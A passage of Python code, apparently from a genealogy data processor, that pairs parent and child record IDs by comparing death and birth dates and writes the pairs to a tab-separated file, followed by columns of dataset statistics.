if id2 in self.dateOfDeceased:
if int(self.dateOfDeceased[id2])>int(self.dob[id1]):
pair = (id2, id1)
self.p_c.append(pair)
else:
pair = (id2, id1)
self.p_c.append(pair)
else:
# check if the child younger than three years old
pass
else:
continue
break
def writeToFile(self, outputFile):
fileOut = open(outputFile, 'w')
for i in self.p_c:
fileOut.write(i[0])
fileOut.write('\t')
fileOut.write(i[1])
fileOut.write('\n')
fileOut.flush()
fileOut.close()
| 67.992857
| 187
| 0.240808
| 2,214
| 38,076
| 4.075429
| 0.074526
| 0.05896
| 0.059847
| 0.047878
| 0.770365
| 0.759282
| 0.759282
| 0.759282
| 0.759282
| 0.759282
| 0
| 0.052724
| 0.701124
| 38,076
| 559
| 188
| 68.11449
| 0.740158
| 0.024005
| 0
| 0.83559
| 0
| 0
| 0.000136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007737
| false
| 0.01354
| 0.003868
| 0
| 0.01354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.